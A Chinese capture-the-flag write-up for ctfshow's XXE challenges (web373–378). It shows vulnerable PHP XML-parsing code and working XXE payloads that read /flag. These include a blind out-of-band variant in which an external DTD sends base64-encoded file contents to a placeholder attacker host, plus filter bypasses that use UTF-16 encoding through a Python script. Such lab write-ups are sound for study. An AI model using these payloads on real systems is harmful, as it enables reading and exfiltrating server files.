web373

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);    
libxml_disable_entity_loader  #禁用/启用加载外部实体的功能     参数为true时为禁用,参数为false为启用
file_get_contents('php://input')   #简单理解就是接受POST请求方式传的数据
loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD) #通过解析一个 XML 标签字符串来组成该文档
simplexml_import_dom   #把 DOM 节点转换为 SimpleXMLElement 对象
$creds->ctfshow 获取页面中的ctfhsow元素

就是最简单的xxe

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [  
<!ENTITY xxe SYSTEM "file:///flag"> ]>
<user><ctfshow>&xxe;</ctfshow></user>

web374

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 13:36:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    

没有回显,需要把结果发送到服务器上

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "https://xxx/test.dtd">
%aaa;
]>

在服务器上新建test.dtd

<!ENTITY % dtd "<!ENTITY &#x25; xxe  SYSTEM 'http://xxx:2233/%file;'> ">
%dtd;
%xxe;

image-20220716185701629


web375

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:22:05
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    

在上题的基础上减去第一行,版本及编码可以不写

<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "https://xxx/test.dtd">
%aaa;
]>

web376

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:23:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    

同上


web377

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2021-01-07 12:59:52
# @Last Modified by:   h1xa
# @Last Modified time: 2021-01-07 15:26:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(preg_match('/<\?xml version="1\.0"|http/i', $xmlfile)){
    die('error');
}
if(isset($xmlfile)){
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
}
highlight_file(__FILE__);    

还过滤了http,编码绕过

import requests

url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'
payload = """<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
"""
payload = payload.encode('utf-16')
requests.post(url ,data=payload)

web378

抓包,发现xml传输

直接读取

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [  
<!ENTITY xxe SYSTEM "file:///flag"> ]>
<user><username>&xxe;</username><password>123456</password></user>

image-20220716200855972


最后修改:2023 年 12 月 15 日
如果觉得我的文章对你有用,请随意赞赏